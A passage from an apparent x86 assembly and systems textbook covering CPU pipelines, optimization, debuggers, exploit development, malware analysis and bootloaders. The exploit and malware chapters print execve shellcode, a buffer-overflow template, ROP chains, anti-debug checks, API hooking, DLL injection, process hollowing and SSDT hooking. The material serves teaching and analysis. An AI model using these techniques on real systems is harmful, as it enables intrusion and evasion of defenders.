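#include <assert.h>

/* Cycles for `instructions` to complete in an ideal pipeline of `stages`
   stages with no stalls or hazards: stages + instructions - 1. */
unsigned long pipeline_cycles(unsigned long stages, unsigned long instructions) {
    assert(stages > 0);
    if (instructions == 0)
        return 0;
    return stages + instructions - 1;
}
```

For the five-stage pipeline above, five instructions finish in 9 cycles instead of the 25 an unpipelined design would need; real pipelines fall short of this because of hazards and mispredicted branches.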

x86 Pipeline Complexity

Modern x86 pipelines have 14-20+ stages:

Frontend: Fetch, decode, micro-op generation
Out-of-order engine: Register renaming, scheduler
Execution: Multiple execution units
Retirement: Reorder buffer, commit

14.2 Superscalar Architecture

Superscalar processors can execute multiple instructions per cycle.

Issue Width

Pentium: 2 instructions
Core architecture: 4-6 micro-ops
Modern CPUs: 4-8 micro-ops

Execution Units

Typical modern CPU:

2-4 integer ALUs
2-3 load/store units
2-3 FP/SIMD units
Branch units

Resource Constraints

; Can execute together (different units)
add eax, ebx      ; ALU0
mov [mem], ecx    ; Store unit
addsd xmm0, xmm1  ; FP unit

; May conflict (same unit)
add eax, ebx      ; ALU0
sub ecx, edx      ; ALU0 (needs next cycle)

14.3 Branch Prediction

Branches can stall the pipeline if mispredicted.

Static Prediction

Older CPUs used simple rules:

Forward branches: not taken
Backward branches: taken (loop)

Dynamic Prediction

Modern CPUs use sophisticated predictors:

Branch Target Buffer (BTB)
Global history
Pattern history tables

Branch Prediction Example

; Well-predicted loop
    mov ecx, 1000
.loop:
    ; do work
    dec ecx
    jnz .loop        ; taken 999 times, not taken once

; Hard-to-predict branch
    cmp eax, ebx
    je .target       ; random data makes prediction difficult

Avoiding Branches

Use conditional moves for simple branches:

; Instead of:
    cmp eax, ebx
    jg .greater
    mov ecx, edx
    jmp .done
.greater:
    mov ecx, esi
.done:

; Use:
    cmp eax, ebx
    cmovg ecx, esi   ; if >, use esi
    cmovle ecx, edx  ; if <=, use edx
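
Compilers frequently turn simple conditional expressions into cmov on their own, but the selection can also be written without any branch at the source level. This C sketch uses a bit mask; select_branchless is a hypothetical helper and the final cast relies on the usual two's-complement conversion:

```c
#include <assert.h>
#include <stdint.h>

static_assert(sizeof(int32_t) == 4, "mask arithmetic assumes 32-bit values");

/* Returns a if cond is nonzero, otherwise b, without a conditional jump. */
int32_t select_branchless(int cond, int32_t a, int32_t b) {
    uint32_t mask = (uint32_t)0 - (uint32_t)(cond != 0);  /* all ones or all zeros */
    return (int32_t)(((uint32_t)a & mask) | ((uint32_t)b & ~mask));
}

/* The example from the text: ecx = (eax > ebx) ? esi : edx. */
int32_t pick(int32_t eax, int32_t ebx, int32_t esi, int32_t edx) {
    return select_branchless(eax > ebx, esi, edx);
}
```

Branchless code pays off mainly when the condition is unpredictable; for well-predicted branches a jump is often just as fast, so it is worth measuring.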

14.4 Out-of-Order Execution

Out-of-order execution allows instructions to execute as soon as their operands are ready, rather than strictly in program order.

Example

; In-order execution would stall:
mov eax, [mem]      ; long latency load
add ebx, eax        ; must wait for eax
add ecx, edx        ; independent, but blocked in-order

; Out-of-order can execute:
mov eax, [mem]      ; starts, then stalls waiting for cache
add ecx, edx        ; executes while waiting
add ebx, eax        ; executes when eax ready

Register Renaming

Eliminates false dependencies:

; Write-after-write (WAW) dependency
add eax, ebx
mov eax, ecx        ; can rename to different physical register

; Write-after-read (WAR) dependency
mov eax, [mem]
add ebx, eax
mov eax, edx        ; can rename

Reorder Buffer (ROB)

Tracks instruction state until retirement:

Allocates entry for each instruction
Holds results until commit
Enables precise exceptions

14.5 Micro-ops

CISC instructions are broken into simpler micro-ops.

x86 to Micro-op Translation

; Complex instruction:
add eax, [mem]      ; breaks into:
; micro-op 1: load from mem into temp
; micro-op 2: add temp to eax

Micro-op Fusion

Multiple micro-ops can be fused:

; Macro-op fusion
cmp eax, ebx
je .target          ; fuses into single compare-and-branch micro-op

; Micro-op fusion
add eax, [mem]      ; fused load+add micro-op

Micro-op Cache

Caches decoded micro-ops to bypass frontend:

Faster than re-decoding
Power efficient
Typical size: 1.5K-6K micro-ops

Chapter 15: Performance Optimization

15.1 Register Optimization

Register Allocation

Prioritize register usage:

Most frequent variables in registers
Avoid spilling to stack
Use callee-saved registers for persistent values

Zeroing Idioms

; Best: xor same register
xor eax, eax        ; 2 bytes, recognized by CPU

; Good: sub same register
sub eax, eax        ; 2 bytes

; Avoid: mov immediate
mov eax, 0          ; 5 bytes, slower

Register Selection

; Good: use smaller registers when possible
mov al, 1           ; instead of mov eax, 1
add bl, cl          ; instead of add ebx, ecx

; But avoid partial register stalls
mov al, [mem]       ; partial write, then
add eax, ebx        ; stall waiting for upper bytes

15.2 Loop Unrolling

Reduce loop overhead by doing more work per iteration.

Before Unrolling

    mov ecx, 1000
    xor eax, eax
.loop:
    add eax, [rsi]
    add rsi, 4
    dec ecx
    jnz .loop

After Unrolling (4x)

    mov ecx, 250      ; 1000/4 iterations
    xor eax, eax
.loop:
    add eax, [rsi]
    add eax, [rsi+4]
    add eax, [rsi+8]
    add eax, [rsi+12]
    add rsi, 16
    dec ecx
    jnz .loop
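
The unrolled loop above only works when the element count is a multiple of four. In C the usual shape is an unrolled main loop followed by a short cleanup loop, as in this sketch (sum_unrolled4 is an illustrative name):

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Sum n 32-bit integers, four per iteration, then handle the 0-3 leftovers. */
int32_t sum_unrolled4(const int32_t *a, size_t n) {
    assert(a != NULL || n == 0);
    int32_t sum = 0;
    size_t i = 0;
    for (; i + 4 <= n; i += 4)      /* main loop: one branch per 4 elements */
        sum += a[i] + a[i + 1] + a[i + 2] + a[i + 3];
    for (; i < n; i++)              /* cleanup loop for the remainder */
        sum += a[i];
    return sum;
}
```

Optimizing compilers often perform this transformation themselves at higher optimization levels, so hand unrolling is best checked against the generated assembly.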

Duff's Device in Assembly

; Handle the remainder with a jump table, then fall into the unrolled loop
    mov ecx, 1000     ; element count
    xor eax, eax      ; running sum
    mov edx, ecx
    and edx, 3        ; remainder = count mod 4 (zero-extended into RDX)
    jmp [jump_table + rdx*8]
    
jump_table:
    dq .case0
    dq .case1
    dq .case2
    dq .case3

.case3:
    add eax, [rsi]
    add rsi, 4
    dec ecx
.case2:
    add eax, [rsi]
    add rsi, 4
    dec ecx
.case1:
    add eax, [rsi]
    add rsi, 4
    dec ecx
.case0:
    ; main loop: ECX is now a multiple of 4

15.3 SIMD Vectorization

Process multiple data elements with one instruction.

SSE Example: Adding Arrays

; Add 4 floats at a time
    mov ecx, 1024      ; array size
    shr ecx, 2         ; 1024/4 iterations
    xor rsi, rsi
    
.loop:
    movaps xmm0, [array1 + rsi]
    addps xmm0, [array2 + rsi]
    movaps [result + rsi], xmm0
    add rsi, 16        ; 4 floats * 4 bytes
    dec ecx
    jnz .loop

AVX Example: 8 Floats

    vmovaps ymm0, [array1 + rsi]
    vaddps ymm0, ymm0, [array2 + rsi]
    vmovaps [result + rsi], ymm0

Automatic Vectorization

Compilers can auto-vectorize:

// Compiler may generate SIMD
for (int i = 0; i < 1024; i++) {
    c[i] = a[i] + b[i];
}

15.4 Cache Optimization

Prefetching

; Software prefetch
    prefetcht0 [rsi + 64]   ; prefetch into all cache levels
    prefetcht1 [rsi + 128]  ; prefetch into L2 and L3
    prefetcht2 [rsi + 192]  ; prefetch into L3 only
    prefetchnta [rsi + 256] ; prefetch into L1, minimize cache pollution

Cache Blocking Example

; Matrix multiplication with blocking (loop skeleton only)
    mov rbx, N
    xor rdi, rdi       ; i block start
.outer_block_i:
    xor rdx, rdx       ; j block start
.outer_block_j:
    xor rsi, rsi       ; k block start
.outer_block_k:
    
    ; Multiply block
    mov r8, BLOCK      ; rows left in this block
.inner_i:
    mov r9, BLOCK      ; columns left in this block
.inner_j:
    ; Compute one element
    dec r9
    jnz .inner_j
    dec r8
    jnz .inner_i
    
    add rsi, BLOCK
    cmp rsi, rbx
    jl .outer_block_k
    
    add rdx, BLOCK
    cmp rdx, rbx
    jl .outer_block_j
    
    add rdi, BLOCK
    cmp rdi, rbx
    jl .outer_block_i

Data Alignment

; Align data to cache line boundaries
section .data
align 64
cache_aligned_data:
    times 1024 dq 0

15.5 Profiling & Benchmarking

RDTSC Timing

; Measure cycles
    rdtsc
    mov [start_lo], eax
    mov [start_hi], edx
    
    ; Code to measure
    
    rdtsc
    sub eax, [start_lo]
    sbb edx, [start_hi]
    ; EDX:EAX = cycles

Performance Counter Access

; Read performance counter
    mov ecx, 0        ; counter number
    rdpmc             ; read EDX:EAX

Profiling with perf

# Sample on counter overflow
perf record -e cycles ./program
perf report

# Cache misses
perf stat -e cache-misses ./program

15.6 Reverse Engineering Compiler Optimizations

Examining Compiler Output

# Generate assembly listing
gcc -S -O2 program.c -o program.s

# With Intel syntax
gcc -S -O2 -masm=intel program.c

Common Compiler Optimizations

Constant folding:

// Original
int x = 10 + 20;

// Optimized
int x = 30;

Constant propagation:

// Original
int a = 5;
int b = a * 2;

// Optimized
int b = 10;

Strength reduction:

// Original
x * 8

// Optimized
x << 3

// Original
x / 4

// Optimized (unsigned)
x >> 2
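
The "(unsigned)" qualifier matters: for signed values a plain arithmetic shift rounds toward negative infinity, while C division truncates toward zero, so compilers add a bias before shifting negative operands. The sketch below illustrates this in Python; the helper names c_div and signed_div_pow2 are hypothetical.

```python
def c_div(x, d):
    """Signed division that truncates toward zero, as the C / operator does."""
    q = abs(x) // abs(d)
    return q if (x < 0) == (d < 0) else -q


def signed_div_pow2(x, n):
    """Divide by 2**n with a shift, adding the bias needed for negative x."""
    bias = (1 << n) - 1 if x < 0 else 0
    return (x + bias) >> n   # Python's >> on ints is an arithmetic shift


# A plain shift disagrees with C division for negative odd values:
plain_shift = -7 >> 2        # floors
c_result = c_div(-7, 4)      # truncates
biased = signed_div_pow2(-7, 2)
```

Here plain_shift differs from c_result, while biased matches it, which is why the signed form of this optimization needs a few extra instructions.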

Common subexpression elimination:

// Original
a = b * c + d;
e = b * c + f;

// Optimized
t = b * c;
a = t + d;
e = t + f;

Compiler Optimizations in Assembly

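; Original C: *p++ = *q++ + 1   (int *p, int *q)
; Unoptimized (-O0), typical shape: p and q live on the stack
    mov rax, [rbp-16]     ; load q
    lea rdx, [rax+4]
    mov [rbp-16], rdx     ; q++
    mov ecx, [rax]        ; *q (old value of q)
    add ecx, 1
    mov rax, [rbp-8]      ; load p
    lea rdx, [rax+4]
    mov [rbp-8], rdx      ; p++
    mov [rax], ecx        ; *p = *q + 1

; Optimized (-O2), with p in RDI and q in RSI:
    mov eax, [rsi]
    add eax, 1
    mov [rdi], eax
    add rsi, 4
    add rdi, 4
    ; (pointers stay in registers; exact output varies by compiler and context)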

PART VI — Reverse Engineering & Security

Chapter 16: Disassembly & Debugging

16.1 GDB (GNU Debugger)

Basic Commands

# Start debugging
gdb ./program

# Set breakpoint
break main
break *0x4004a6

# Run program
run
run arg1 arg2

# Examine registers
info registers
print $rax
x/x $rsp          # examine memory

# Step through
stepi             # instruction step
nexti             # step over calls
continue          # continue execution

# Disassemble
disas main
disas /r main     # show raw bytes

# Examine memory
x/10x $rsp        # 10 hex words
x/10i $rip        # 10 instructions

GDB Scripting

# gdb.py - Python scripting
import gdb

class TraceCalls(gdb.Command):
    """Trace function calls"""
    def __init__(self):
        super(TraceCalls, self).__init__("trace-calls", gdb.COMMAND_USER)

    def invoke(self, arg, from_tty):
        gdb.execute("break *0x4004a6")
        gdb.execute("commands\n silent\n print $rax\n continue\n end")

TraceCalls()

16.2 WinDbg

Windows debugger commands:

# Set breakpoint
bp kernel32!CreateFileW

# Run
g

# Registers
r
r rax

# Memory
db address        # display bytes
dd address        # display dwords
dq address        # display qwords

# Disassemble
u address
u rip L20         # 0x20 (32) instructions; numbers are hex by default

# Stack
k                 # call stack
dv                # local variables

16.3 x64dbg

User-friendly Windows debugger:

Graphical interface
Plugin support
Scriptable
Memory map view
Breakpoint types:
- Software (INT3)
- Hardware (DR0-DR3)
- Memory (guard pages)

16.4 IDA Pro

Advanced disassembler features:

Cross-references
Function identification
Structure reconstruction
FLIRT signatures
Decompiler (Hex-Rays)

IDA Scripting

# IDAPython example (IDA 7.x and later API names)
import idautils
import idc

for seg in idautils.Segments():
    print(hex(seg), idc.get_segm_name(seg))
    
for func in idautils.Functions():
    print(hex(func), idc.get_func_name(func))

16.5 Ghidra

NSA's open-source reverse engineering tool:

Java-based GUI
Decompiler
Scripting in Java/Python
Collaborative features

Ghidra Scripts

# Python (Jython) script in Ghidra
# currentProgram is provided by the Ghidra script environment
for func in currentProgram.getFunctionManager().getFunctions(True):
    print("%s %s" % (func.getName(), func.getEntryPoint()))

16.6 Static vs Dynamic Analysis

Static Analysis

Examining code without execution:

Disassembly
Control flow graphs
Data flow analysis
String references
Import/export tables

Tools: IDA, Ghidra, radare2, Binary Ninja

Dynamic Analysis

Running code in controlled environment:

Debugging
Tracing (strace, ltrace)
Memory dumps
API monitoring
Fuzzing

Tools: GDB, WinDbg, x64dbg, OllyDbg

Hybrid Approach

Use static to understand structure
Use dynamic to confirm behavior
Set breakpoints at interesting locations
Trace execution paths

Chapter 17: Exploit Development Basics

17.1 Stack Buffer Overflow

Classic vulnerability: writing beyond buffer bounds.

Vulnerable Code

void vulnerable(char *input) {
    char buffer[64];
    strcpy(buffer, input);  // No bounds check!
}

Stack Layout Before Overflow

High addresses
+------------------+
| Return address   |
+------------------+
| Saved RBP        |
+------------------+
| buffer[63]       |
| ...              |
| buffer[0]        |
+------------------+ <--- RSP
Low addresses

Overflow to Control RIP

; Input crafted to:
; 1. Fill buffer (64 bytes)
; 2. Overwrite saved RBP (8 bytes)
; 3. Overwrite return address with shellcode address

Simple Exploit (32-bit)

# Python exploit template
buffer = "A" * 64          # padding
buffer += "BBBBBBBB"       # saved EBP
buffer += "\x60\xa0\x04\x08" # return to shellcode

# Shellcode (execve /bin/sh)
shellcode = (
    "\x31\xc0\x50\x68\x2f\x2f\x73\x68"
    "\x68\x2f\x62\x69\x6e\x89\xe3\x50"
    "\x53\x89\xe1\xb0\x0b\xcd\x80"
)

print buffer + shellcode

17.2 Heap Exploitation

Heap-based vulnerabilities are more complex.

Heap Structure

Chunk header:
    prev_size (if previous free)
    size (with flags: PREV_INUSE, IS_MMAPPED)
    fd (forward pointer - if free)
    bk (backward pointer - if free)
User data...

Use-After-Free

char *ptr = malloc(100);
free(ptr);
// ... later
strcpy(ptr, "exploit");  // Use after free!

Double Free

char *ptr = malloc(100);
free(ptr);
free(ptr);  // Double free - corrupts allocator

17.3 Return-Oriented Programming (ROP)

Bypass NX/DEP by reusing existing code.

Gadgets

Small instruction sequences ending in ret:

; Find gadgets in binary
pop rax; ret
pop rdi; ret
syscall; ret
mov [rax], rdx; ret

ROP Chain Example

; execve("/bin/sh", NULL, NULL)
; Gadget addresses:
pop_rdi = 0x400123
pop_rsi = 0x400456
pop_rdx = 0x400789
syscall = 0x400abc
binsh = 0x601000  ; address of "/bin/sh" string

; ROP chain on stack:
pop_rdi
binsh
pop_rsi
0
pop_rdx
0
syscall

17.4 Shellcode Writing

Basic Shellcode (Linux x86-64)

; execve("/bin/sh", NULL, NULL)
section .text
    global _start

_start:
    ; execve syscall number: 59
    push 59
    pop rax
    
    ; "/bin/sh" string
    push 0
    ; "/bin/sh" as bytes: 2f 62 69 6e 2f 73 68
    ; Stored little-endian, the qword reads 0x0068732f6e69622f (top byte is the terminator)
    mov rbx, 0x68732f6e69622f
    push rbx
    mov rdi, rsp      ; RDI points to "/bin/sh"
    
    ; argv = {rdi, NULL}
    xor rsi, rsi      ; NULL argv
    push rsi
    push rdi
    mov rsi, rsp      ; RSI points to argv
    
    ; envp = NULL
    xor rdx, rdx
    
    syscall

Null-Free Shellcode

Avoid null bytes that would terminate strings:

; Instead of:
mov eax, 59    ; contains null bytes in 64-bit

; Use:
push 59
pop rax        ; no nulls

; Instead of:
mov rbx, 0x68732f6e69622f  ; may have nulls
; Use:
xor rbx, rbx
mov bl, 0x2f
shl rbx, 8
...

17.5 Bypassing ASLR & DEP

ASLR (Address Space Layout Randomization)

Randomizes memory addresses:

Stack
Heap
Libraries
Executable (PIE)

Bypass Techniques

Information leak: Read memory to find addresses
Partial overwrite: Modify low bytes only
Return to PLT: Use known function addresses
Brute force: 32-bit ASLR can be brute-forced

DEP (Data Execution Prevention)

Marks stack/heap as non-executable.

Bypass with ROP

Use existing code (no shellcode on stack)
Chain gadgets to perform actions
Can call mprotect/VirtualProtect to make memory executable

Example: Call mprotect via ROP

; mprotect(addr, len, PROT_READ|PROT_WRITE|PROT_EXEC)
; Gadgets:
pop_rdi
pop_rsi
pop_rdx
pop_rax
syscall

; ROP chain:
pop_rdi
page_address      ; start of shellcode page
pop_rsi
0x1000            ; length
pop_rdx
7                 ; PROT_READ|PROT_WRITE|PROT_EXEC
pop_rax
10                ; mprotect syscall
syscall
; then jump to shellcode

Chapter 18: Malware Analysis

18.1 Packers & Obfuscation

Packers compress/encrypt the original executable.

Packed Executable Structure

+------------------+
| Packer stub      |
| - decompress     |
| - decrypt        |
| - resolve imports|
| - jump to OEP    |
+------------------+
| Packed original  |
| (compressed/     |
|  encrypted)      |
+------------------+

Detecting Packers

Section names: UPX0, UPX1, .packed, etc.
Entropy analysis
Import table looks suspicious
Small number of imports
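
Entropy analysis can be sketched in a few lines. The function below is a minimal illustration (the name shannon_entropy is hypothetical); it computes the Shannon entropy of a byte string in bits per byte. Compressed or encrypted sections tend to score close to 8, while ordinary code and data usually score noticeably lower. Any cutoff value is a rule of thumb, not a guarantee.

```python
import math
from collections import Counter


def shannon_entropy(data: bytes) -> float:
    """Return the Shannon entropy of data in bits per byte (0.0 to 8.0)."""
    if not data:
        return 0.0
    total = len(data)
    counts = Counter(data)   # occurrences of each byte value
    return -sum((c / total) * math.log2(c / total) for c in counts.values())


low = shannon_entropy(b"\x00" * 1024)          # a single repeated byte
high = shannon_entropy(bytes(range(256)) * 4)  # every byte value equally often
```

In practice the function would be applied to each section of the executable separately, since a packed payload often sits in one high-entropy section next to a small low-entropy stub.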

Unpacking Techniques

Static unpacking: Use unpacker tools
Dynamic unpacking: Run and dump after unpack
Manual OEP finding: Set breakpoints on memory access

; Find OEP by breaking on:
; - Return from unpacking routine
; - Access to packed code section
; - API calls (after imports resolved)

18.2 Anti-Debug Techniques

IsDebuggerPresent (Windows)

; Check BeingDebugged flag in PEB
mov rax, gs:[60h]    ; PEB
mov al, [rax+2]      ; BeingDebugged flag
test al, al
jnz being_debugged

NtGlobalFlag (Windows)

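; Check NtGlobalFlag in PEB
mov rax, gs:[60h]    ; PEB (64-bit)
mov eax, [rax+0BCh]  ; NtGlobalFlag (offset 0xBC in the 64-bit PEB, 0x68 in the 32-bit PEB)
; Normal = 0; 0x70 when the process was started under a debugger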

Timing Checks

; Check if single-stepping
rdtsc                 ; get timestamp
; ... some code ...
rdtsc
sub eax, old_eax
cmp eax, threshold    ; if too slow, being debugged
ja being_debugged

INT3 Detection

; Check for software breakpoints (0xCC)
mov al, [address]
cmp al, 0xCC
je breakpoint_found

PTRACE (Linux)

; Try to ptrace self - can only have one tracer
mov rax, 101          ; ptrace syscall
xor rdi, rdi          ; PTRACE_TRACEME
xor rsi, rsi
xor rdx, rdx
xor r10, r10
syscall
cmp rax, -1
je being_traced

18.3 API Hooking

IAT Hooking

Modify Import Address Table to redirect API calls:

; Original IAT entry points to MessageBoxA
; After hook: points to our function

hook_function:
    ; Save registers
    push rax
    ; Do malicious stuff
    ; Call original API
    pop rax
    jmp original_MessageBoxA

Inline Hooking

Modify function prologue:

; Original function:
MessageBoxA:
    mov r10, rcx      ; original first instruction
    ; ...

; After hook (5-byte jmp):
MessageBoxA:
    jmp hook_function ; overwrites first 5 bytes
    ; ... (rest of function after overwritten bytes)

Detours Library (Microsoft)

// Hook function with Detours
PBYTE OriginalMessageBox = 
    (PBYTE)DetourFindFunction("user32.dll", "MessageBoxA");

DetourTransactionBegin();
DetourUpdateThread(GetCurrentThread());
DetourAttach(&(PVOID&)OriginalMessageBox, HookedMessageBox);
DetourTransactionCommit();

18.4 Process Injection

DLL Injection

// 1. Open target process
HANDLE hProcess = OpenProcess(
    PROCESS_ALL_ACCESS, FALSE, pid);

// 2. Allocate memory in target
LPVOID pRemoteMemory = VirtualAllocEx(
    hProcess, NULL, sizeof(dllpath),
    MEM_COMMIT, PAGE_READWRITE);

// 3. Write DLL path
WriteProcessMemory(hProcess, pRemoteMemory, 
    dllpath, sizeof(dllpath), NULL);

// 4. Create remote thread to load DLL
HANDLE hThread = CreateRemoteThread(
    hProcess, NULL, 0,
    (LPTHREAD_START_ROUTINE)LoadLibraryA,
    pRemoteMemory, 0, NULL);

Process Hollowing

Create process in suspended state
Unmap original executable
Allocate memory for malicious code
Write malicious code
Set entry point and resume

// Create suspended process
CreateProcess(..., CREATE_SUSPENDED, ...);

// Get thread context
GetThreadContext(hThread, &ctx);

// Unmap original executable
NtUnmapViewOfSection(hProcess, ctx.Rdx);  // 64-bit

// Allocate memory for new executable
VirtualAllocEx(hProcess, imageBase, ...);

// Write new executable
WriteProcessMemory(...);

// Set new entry point
ctx.Rcx = newEntryPoint;
SetThreadContext(hThread, &ctx);

// Resume thread
ResumeThread(hThread);

18.5 Rootkits & Bootkits

Kernel Rootkits

Load as kernel drivers:

Hook system calls (SSDT)
Hook interrupt handlers (IDT)
Filter file system operations
Hide processes/files

SSDT Hooking

// Save original syscall address
origNtOpenProcess = 
    (PVOID)KeServiceDescriptorTable->ServiceTable[0x7A];

// Replace with our function
KeServiceDescriptorTable->ServiceTable[0x7A] = 
    (PVOID)HookNtOpenProcess;

// In hook function
NTSTATUS HookNtOpenProcess(...) {
    // Check if caller is allowed
    if (IsMalicious(ProcessId))
        return STATUS_ACCESS_DENIED;
    
    // Call original
    return origNtOpenProcess(...);
}

Bootkits

Infect boot process:

Master Boot Record (MBR)
Volume Boot Record (VBR)
UEFI firmware

MBR Infection

MBR Layout:
Offset 0x000: Boot code (446 bytes)
Offset 0x1BE: Partition table (64 bytes)
Offset 0x1FE: Signature bytes 0x55, 0xAA (the little-endian word 0xAA55)

Bootkit:
- Replace boot code
- Load before OS
- Remain persistent

UEFI Rootkits

More sophisticated:

Infect UEFI firmware
Run at highest privilege
Survive OS reinstall
Can disable security features

PART VII — Operating System Development

Chapter 19: Bootloaders

19.1 BIOS Boot Process

Boot Sequence

Power-on self-test (POST)
BIOS initializes hardware
BIOS searches for bootable devices
Loads first sector (512 bytes) to 0x7C00
Jumps to 0x7C00

Boot Sector Layout

Offset 0x000 - 0x1BD: Boot code
Offset 0x1BE - 0x1FD: Partition table
Offset 0x1FE - 0x1FF: Signature bytes 0x55, 0xAA (the little-endian word 0xAA55)
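
The layout above can be checked against a disk image with a short script. The sketch below is an illustration under assumptions: the function name parse_boot_sector and the returned dictionary keys are hypothetical, and only the classic MBR partition entry fields (status, type, starting LBA, sector count) are decoded.

```python
import struct

SECTOR_SIZE = 512
PARTITION_TABLE_OFFSET = 0x1BE
SIGNATURE_OFFSET = 0x1FE


def parse_boot_sector(sector: bytes):
    """Return (signature_ok, partitions) for a 512-byte boot sector."""
    if len(sector) != SECTOR_SIZE:
        raise ValueError("expected a 512-byte sector")
    signature_ok = sector[SIGNATURE_OFFSET:SIGNATURE_OFFSET + 2] == b"\x55\xAA"
    partitions = []
    for index in range(4):
        offset = PARTITION_TABLE_OFFSET + 16 * index
        # status, 3 CHS bytes (skipped), type, 3 CHS bytes (skipped), LBA start, sector count
        status, ptype, lba_start, count = struct.unpack_from("<B3xB3xII", sector, offset)
        if ptype != 0:   # type 0 marks an unused entry
            partitions.append({
                "index": index,
                "bootable": status == 0x80,
                "type": ptype,
                "lba_start": lba_start,
                "sectors": count,
            })
    return signature_ok, partitions
```

A typical use is to read the first 512 bytes of an image file in binary mode and pass them to parse_boot_sector.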

Simple Bootloader

; boot.asm - Simple bootloader
[org 0x7C00]
[bits 16]

start:
    ; Set up segments
    xor ax, ax
    mov ds, ax
    mov es, ax
    mov ss, ax
    mov sp, 0x7C00
    
    ; Print message
    mov si, msg
    call print_string
    
    ; Hang
    jmp $

print_string:
    lodsb
    or al, al
    jz .done
    mov ah, 0x0E
    int 0x10
    jmp print_string
.done:
    ret

msg db "Hello from bootloader!", 13, 10, 0

; Pad to 510 bytes
times 510-($-$$) db 0
dw 0xAA55

19.2 UEFI

Unified Extensible Firmware Interface.

UEFI Applications

// uefi_main.c
#include <efi.h>
#include <efilib.h>

EFI_STATUS
EFIAPI
efi_main(EFI_HANDLE ImageHandle, EFI_SYSTEM_TABLE *SystemTable) {
    InitializeLib(ImageHandle, SystemTable);
    
    Print(L"Hello from UEFI!\n");
    
    return EFI_SUCCESS;
}

UEFI Boot Services

Memory allocation
Protocol handlers
Image loading
Event handling

UEFI Runtime Services

Variable services
Time services
Reset services

19.3 Writing a Bootloader

Stage 1: Load Second Stage

; Load more sectors
load_second_stage:
    mov ah, 0x02        ; read sectors
    mov al, 0x10        ; sectors to read
    mov ch, 0           ; cylinder
    mov cl, 2           ; sector (1-based)
    mov dh, 0           ; head
    mov dl, [boot_drive]; drive
    mov bx, 0x1000      ; buffer
    mov es, bx
    xor bx, bx
    int 0x13
    
    jc disk_error
    
    ; Jump to second stage
    jmp 0x1000:0x0000

Entering Protected Mode

; Enable A20 line
enable_a20:
    in al, 0x92
    or al, 2
    out 0x92, al
    ret

; Load GDT
load_gdt:
    cli                 ; no protected-mode IDT yet, so mask interrupts
    lgdt [gdt_desc]
    
    ; Switch to protected mode
    mov eax, cr0
    or eax, 1           ; set CR0.PE
    mov cr0, eax
    
    ; Far jump loads CS and flushes the prefetch queue
    jmp 0x08:protected_mode

[bits 32]
protected_mode:
    mov ax, 0x10        ; data segment
    mov ds, ax
    mov es, ax
    mov fs, ax
    mov gs, ax
    mov ss, ax
    mov esp, 0x90000

19.4 Protected Mode Switching

GDT for Protected Mode

gdt_start:
    ; Null descriptor
    dq 0
    
    ; Code segment
    dw 0xFFFF           ; limit 0-15
    dw 0                ; base 0-15
    db 0                ; base 16-23
    db 0x9A             ; present, ring0, code, readable
    db 0xCF             ; 4KB granularity, 32-bit, limit 16-19
    db 0                ; base 24-31
    
    ; Data segment
    dw 0xFFFF
    dw 0
    db 0
    db 0x92             ; present, ring0, data, writable
    db 0xCF
    db 0
gdt_end:

gdt_desc:
    dw gdt_end - gdt_start - 1
    dd gdt_start
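
The scattered base and limit fields are easier to see when a descriptor is assembled from its parts. The sketch below is illustrative (the function name gdt_descriptor is hypothetical); it packs base, limit, access byte, and the 4-bit flags nibble into the 8-byte value that the dw/db lines above spell out field by field.

```python
def gdt_descriptor(base, limit, access, flags):
    """Build a 64-bit segment descriptor from its logical fields."""
    value = limit & 0xFFFF                   # limit bits 0-15
    value |= (base & 0xFFFFFF) << 16         # base bits 0-23
    value |= (access & 0xFF) << 40           # access byte (0x9A code, 0x92 data)
    value |= ((limit >> 16) & 0xF) << 48     # limit bits 16-19
    value |= (flags & 0xF) << 52             # flags: granularity, size, long mode
    value |= ((base >> 24) & 0xFF) << 56     # base bits 24-31
    return value


# Flat 4 GB segments as in the table above: limit 0xFFFFF, flags 0xC (4 KB granularity, 32-bit)
code_segment = gdt_descriptor(0, 0xFFFFF, 0x9A, 0xC)
data_segment = gdt_descriptor(0, 0xFFFFF, 0x92, 0xC)
```

Printing hex(code_segment) gives the same bytes that the code segment entry above lays out by hand, read as one little-endian qword.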

19.5 Long Mode Activation

Switching to 64-bit Long Mode

; Check for long mode support
check_long_mode:
    mov eax, 0x80000000
    cpuid
    cmp eax, 0x80000001
    jb no_long_mode
    
    mov eax, 0x80000001
    cpuid
    test edx, 1 << 29   ; LM bit
    jz no_long_mode
    ret

; Set up paging
setup_paging:
    ; Clear page tables
    mov edi, 0x1000
    mov cr3, edi
    xor eax, eax
    mov ecx, 4096
    rep stosd
    
    ; Set up PML4
    mov edi, cr3
    mov dword [edi], 0x2003      ; PDPT at 0x2000, present/write
    
    ; Set up PDPT
    mov edi, 0x2000
    mov dword [edi], 0x3003      ; PD at 0x3000, present/write
    
    ; Set up PD
    mov edi, 0x3000
    mov dword [edi], 0x4003      ; PT at 0x4000, present/write
    
    ; Set up PT (identity map first 2MB)
    mov edi, 0x4000
    mov eax, 3                    ; present/write
    mov ecx, 512
.map_2mb:
    mov [edi], eax
    add eax, 0x1000
    add edi, 8
    loop .map_2mb
    ret

; Enable long mode
enable_long_mode:
    ; Enable PAE
    mov eax, cr4
    or eax, 1 << 5
    mov cr4, eax
    
    ; Set EFER.LME
    mov ecx, 0xC0000080
    rdmsr
    or eax, 1 << 8
    wrmsr
    
    ; Enable paging
    mov eax, cr0
    or eax, 1 << 31
    mov cr0, eax
    ret
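
To see why four tables are needed, it helps to split a virtual address into the index used at each level. The sketch below is illustrative (the function name split_virtual_address is hypothetical) and assumes 4-level paging with 4 KB pages, as set up above.

```python
def split_virtual_address(vaddr):
    """Split a virtual address into its 4-level paging indices (4 KB pages)."""
    return {
        "pml4": (vaddr >> 39) & 0x1FF,   # bits 39-47
        "pdpt": (vaddr >> 30) & 0x1FF,   # bits 30-38
        "pd": (vaddr >> 21) & 0x1FF,     # bits 21-29
        "pt": (vaddr >> 12) & 0x1FF,     # bits 12-20
        "offset": vaddr & 0xFFF,         # bits 0-11
    }


last_mapped_page = split_virtual_address(0x1FF000)   # last page of the first 2 MB
first_unmapped = split_virtual_address(0x200000)     # needs PD entry 1
```

Every address below 2 MB uses entry 0 of the PML4, PDPT, and PD, which is why setup_paging only fills one entry in each of those tables and all 512 entries of the single page table.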

Chapter 20: Kernel Development

20.1 Interrupt Descriptor Table

IDT Setup in Long Mode

; Set up IDT entry
; RDI = index, RSI = handler, RDX = type (e.g. 0x8E)
setup_idt_entry:
    push rbp
    mov rbp, rsp
    
    ; Calculate entry address
